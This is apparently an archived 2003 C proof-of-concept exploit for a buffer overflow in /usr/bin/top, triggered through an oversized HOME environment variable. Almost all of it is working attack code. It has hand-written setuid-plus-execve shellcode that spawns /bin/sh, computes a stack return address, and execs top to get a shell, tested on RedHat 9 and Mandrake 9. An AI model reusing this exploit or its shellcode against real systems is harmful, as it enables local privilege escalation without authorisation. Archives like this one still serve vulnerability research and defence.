// source: https://www.securityfocus.com/bid/8239/info A buffer overflow condition has been reported in top when handling environment variables of excessive length. This may result in an attacker potentially executing arbitrary code. /* * UHAGr CONFIDENTIAL SOURCE - DO NOT DISTRIBUTE * Local /usr/bin/top Proof of Concept Exploit * Bug Discovered & Coded by Darksock * Copyright (c) by UHAGr 2003 - 2004 * Note: it should work on all distros * Tested under RedHat 9.0, Mandrake 9.0 * Still, it should be working under all * distros since it's maintainer is still * not informed about this bug. */ #include #include #include /* * This method of exploitation would let as * know the exact address of our shellcode. * We place it to the last environmental * variable, which address will be: * 0xbfffffff(top of the stack) minus four * NULLs due to elf header structure, minus * the program's name, minus the bytes of * our shellcode. That simple ;) */ #define TOP "/usr/bin/top" #define DEFRET 0xbffffffa - strlen(sc) - strlen(TOP) #define BS 1100 /* * setuid(); + execve(); + exit(); shellcode */ char sc[] = "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\x31" "\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f" "\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1" "\x31\xd2\x31\xc0\xb0\x0b\xcd\x80\x31" "\xc0\x31\xdb\xb0\x01\xcd\x80"; int main(void) { int ctr = 0; char buffer[BS]; fprintf(stdout, "\nCopyright (c) by UHAGr 2003 - 2004\n"); fprintf(stdout, "/usr/bin/top Proof of Concept Exploit\n\n"); fprintf(stdout, "[~] Starting exploiting proccess...\n"); fprintf(stdout, "[~] Using ret address: 0x%8x\n", (long) DEFRET); for(ctr = 0; ctr < BS - 1; ctr += 4) *(long *) &buffer[ctr] = (long) DEFRET; buffer[BS - 1] = '\0'; fprintf(stdout, "[~] Setting environmental variables\n"); if((setenv("HOME", buffer, 1)) == -1) { perror("setenv()"); exit(1); } if((setenv("TOPX", sc, 1)) == -1) { perror("setenv()"); exit(1); } fprintf(stdout, "[~] Executing %s...\n\n", TOP); if((execl(TOP, TOP, NULL)) == -1) { perror("execl()"); exit(1); } return(0); }